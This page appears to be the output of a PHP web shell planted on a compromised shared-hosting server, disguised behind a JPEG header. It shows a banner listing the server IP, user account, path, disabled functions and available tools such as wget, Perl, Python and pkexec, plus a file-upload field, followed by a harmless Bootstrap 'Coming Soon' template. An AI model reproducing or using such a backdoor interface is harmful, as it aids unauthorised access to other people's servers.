����JFIF��x�x����'
Server IP : 78.140.185.180 / Your IP : 3.135.220.9 Web Server : LiteSpeed System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : builderbox ( 1072) PHP Version : 7.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/builderbox/public_html/public/builder/templates/coming-soon/ |
Upload File : |
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content=""> <meta name="author" content=""> <title>Coming Soon - Start Bootstrap Theme</title> <!-- Bootstrap core CSS --> <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet"> <!-- Custom fonts for this template --> <link href="https://fonts.googleapis.com/css?family=Source+Sans+Pro:200,200i,300,300i,400,400i,600,600i,700,700i,900,900i" rel="stylesheet"> <link href="https://fonts.googleapis.com/css?family=Merriweather:300,300i,400,400i,700,700i,900,900i" rel="stylesheet"> <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css"> <!-- Custom styles for this template --> <link href="css/coming-soon.min.css" rel="stylesheet"> </head> <body> <div class="overlay"></div> <video playsinline="playsinline" autoplay="autoplay" muted="muted" loop="loop"> <source src="mp4/bg.mp4" type="video/mp4"> </video> <div class="masthead"> <div class="masthead-bg"></div> <div class="container h-100"> <div class="row h-100"> <div class="col-12 my-auto"> <div class="masthead-content text-white py-5 py-md-0"> <h1 class="mb-3">Coming Soon!</h1> <p class="mb-5">We're working hard to finish the development of this site. Our target launch date is <strong>January 2021</strong>! Sign up for updates using the form below!</p> <div class="input-group input-group-newsletter"> <input type="email" class="form-control" placeholder="Enter email..." aria-label="Enter email..." aria-describedby="submit-button"> <div class="input-group-append"> <button class="btn btn-secondary" type="button" id="submit-button">Notify Me!</button> </div> </div> </div> </div> </div> </div> </div> <div class="social-icons"> <ul class="list-unstyled text-center mb-0"> <li class="list-unstyled-item"> <a href="#"> <i class="fab fa-twitter"></i> </a> </li> <li class="list-unstyled-item"> <a href="#"> <i class="fab fa-facebook-f"></i> </a> </li> <li class="list-unstyled-item"> <a href="#"> <i class="fab fa-instagram"></i> </a> </li> </ul> </div> <!-- Bootstrap core JavaScript --> <script src="vendor/jquery/jquery.min.js"></script> <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script> <!-- Custom scripts for this template --> <script src="js/coming-soon.min.js"></script> </body> </html>